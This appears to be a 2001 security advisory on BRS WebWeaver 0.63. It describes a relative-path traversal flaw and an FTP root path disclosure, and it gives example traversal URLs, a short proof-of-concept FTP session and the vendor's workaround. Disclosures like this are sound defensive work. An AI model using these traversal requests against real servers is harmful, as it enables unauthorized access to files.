BRS WebWeaver Web Server Relative Path Vulnerability

Reported April 29, 2001, by Joe Testa.

VERSION AFFECTED

  • BRS WebWeaver 0.63 for Windows NT and Windows 9x

 

DESCRIPTION

A vulnerability exists in BRS WebWeaver 0.63 that lets an attacker use relative paths to break out of an FTP root. For example, an attacker can access the root directory where the FTP server is running by connecting to a vulnerable host and issuing the command http:///syshelp/.. and http:///sysimages/.. and http:///scripts/.. In addition, an attacker can cause the Web server to disclose the physical path of FTP root.

 

DEMONSTRATION

 

Joe Testa provided the following proof-of-concept scenario:

 

>ftp localhost
Connected to xxxxxxxxxxxx.rh.rit.edu.
220 BRS WebWeaver FTP Server ready.
User (xxxxxxxxxxxx.rh.rit.edu:(none)): jdog
331 Password required for jdog.
Password:
230 User jdog logged in.
ftp> cd *
250 CWD command successful. "/*/" is current directory.
ftp> ls
200 Port command successful.
150 Opening data connection for directory list.
c:\windows\desktop\*\*.* not found
226 File sent ok
ftp: 36 bytes received in 0.06Seconds 0.60Kbytes/sec.
ftp>
 

 

VENDOR RESPONSE

 

No solution exists for the FTP root disclosure vulnerability. However, you can prevent the Web server root traversal vulnerability by removing all user-defined aliases (e.g., syshelp and sysimages) as well as the Internet Server API (ISAPI)/Common Gateway Interface (CGI) alias (e.g., scripts). The vendor, Blaine R. Southam, has been notified, but has not yet provided a fix.

 

CREDIT


Discovered by Joe Testa.

Hide comments

Comments

  • Allowed HTML tags: <em> <strong> <blockquote> <br> <p>

Plain text

  • No HTML tags allowed.
  • Web page addresses and e-mail addresses turn into links automatically.
  • Lines and paragraphs break automatically.
Publish